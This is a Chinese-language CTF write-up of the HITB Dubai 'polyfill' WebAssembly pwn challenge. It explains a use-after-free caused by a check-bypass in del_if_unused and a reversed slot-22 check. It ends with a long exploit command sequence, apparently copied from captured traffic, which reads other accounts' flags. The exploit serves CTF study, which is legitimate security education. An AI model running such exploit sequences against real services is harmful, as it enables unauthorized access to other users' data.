191018 pwn-HITB_dubai polyfill

Polyfill


写作dubai-ctf,然而在阿布扎比举办233
风格迥异,被毛子吊锤一百遍啊一百遍

第二天主要在看一个wasm的pwn,发现了UAF的漏洞但是由于对heap没了解所以没写利用。队里的pwn手觉得没法用所以没写,最后偷了流量重发爽了一天。赛中修复了题目,但是并没有起效。事后分析了一下确实是那个UAF的洞。

题目文件

http是一个web演示接口,可以通过html+js+engine.wasm来加载polyfill.wasm
tcp则可以通过wasmtime直接执行它

wasmtime --dir=flags polyfill.wasm

可以登录或者注册,每个服务器上会由check上传flag,所以目标就是越权读取其他账户

总的来说是一个画图的功能,有frame、poly、point三层结构
10个frame,每个Frame上有25个poly的槽,这些是在全局变量中
每次申请new_poly时则会malloc(0x64),将指针填入frame的槽中
然后每个point占用2个字节,存在poly里
所以每个poly里最多有50个point

类似于菜单题,所以可以任意读写、malloc、free

漏洞点在del_if_unused中
在del之前会直接将该槽置0,然后检查其他地方是否有该指针的拷贝,如果没有则Free

但是当判断到0的时候会直接跳过整个frame,所以存在check的bypass
(此处应有图,但是迪拜好像上传不上csdn的图床2333)

具体利用就不搞了,对堆不熟悉_(:」∠)

于是找到这里的wat直接patch掉对应跳过的语句,再重新编译成wasm即可

然后赛时这个修复并没有起效,回头又分析了一下发现有个类似后门一样的东西
frame_is_empty中的检查方法是手动逐个检查poly槽,如果全0就直接跳过
但是!TMD!22号槽是反着检查的!
也就是说如果创建了22个poly,也会直接认为它为空,直接跳过 所以这里也能bypass check

附上偷来的exp
必须登录而不是注册,因为地址跟具体结构有关
几个%d的地方填上要写入的username

set_frame 2
new_poly
new_poly
set_frame 0
# 24
new_poly
new_poly
new_poly
new_poly
new_poly
new_poly
new_poly
new_poly
new_poly
new_poly
new_poly
new_poly
new_poly
new_poly
new_poly
new_poly
new_poly
new_poly
new_poly
new_poly
new_poly
new_poly
new_poly
new_poly
set_frame 2
new_poly
set_frame 0
new_poly
set_frame 2
# 11
new_poly
new_poly
new_poly
new_poly
new_poly
new_poly
new_poly
new_poly
new_poly
new_poly
new_poly
set_frame 0
copy_frame 1
del_poly 0
del_poly 1
del_poly 2
del_poly 3
del_poly 4
del_poly 5
del_poly 6
del_poly 7
del_poly 8
del_poly 9
del_poly 10
del_poly 11
del_poly 12
del_poly 13
del_poly 14
del_poly 15
del_poly 16
del_poly 17
del_poly 18
del_poly 19
del_poly 20
del_poly 21
del_poly 22
del_poly 23
set_frame 1
del_poly 0
del_poly 1
del_poly 2
del_poly 3
del_poly 4
del_poly 5
del_poly 6
del_poly 7
del_poly 8
del_poly 9
del_poly 10
del_poly 11
del_poly 12
del_poly 13
del_poly 14
del_poly 15
del_poly 16
del_poly 17
del_poly 18
del_poly 19
del_poly 20
del_poly 21
del_poly 22
del_poly 23
del_poly 24
set_frame 0
add_point 24 0 208 0
add_point 24 1 2 0
new_poly
new_poly
add_point 1 0 105 108
add_point 1 1 119 65
add_point 1 2 101 87
add_point 1 3 87 109
add_point 1 4 %d %d
add_point 1 5 %d %d
add_point 1 6 %d %d
add_point 1 7 %d %d
add_point 1 8 %d %d
add_point 1 9 %d %d
add_point 1 10 %d %d
set_frame 2
add_point 0 0 16 8
add_point 0 1 42 23
add_point 0 2 28 5
add_point 0 3 78 24
add_point 0 4 51 9
add_point 0 5 78 16
add_point 0 6 38 8
add_point 0 7 18 14
add_point 0 8 18 16
add_point 0 9 56 1
add_point 1 0 43 3
add_point 1 1 29 16
add_point 1 2 53 6
add_point 1 3 43 9
add_point 1 4 31 24
add_point 1 5 59 18
add_point 1 6 60 8
add_point 1 7 13 12
add_point 1 8 54 15
add_point 1 9 75 17
add_point 1 10 3 12
add_point 1 11 30 5
add_point 1 12 71 19
add_point 1 13 38 20
add_point 1 14 20 6
add_point 1 15 15 4
add_point 2 0 25 9
add_point 2 1 52 12
add_point 2 2 4 2
add_point 2 3 34 23
add_point 2 4 16 6
add_point 2 5 35 19
add_point 2 6 52 12
add_point 2 7 42 5
add_point 2 8 12 13
add_point 2 9 17 13
add_point 2 10 20 4
add_point 2 11 21 2
add_point 2 12 11 21
add_point 2 13 74 18
add_point 2 14 43 21
add_point 2 15 42 19
add_point 2 16 59 13
add_point 2 17 51 24
add_point 2 18 30 9
add_point 2 19 73 2
add_point 2 20 1 7
add_point 2 21 48 12
add_point 2 22 35 15
add_point 2 23 20 8
add_point 2 24 40 13
add_point 2 25 69 6
render

你可能感兴趣的:(CTF)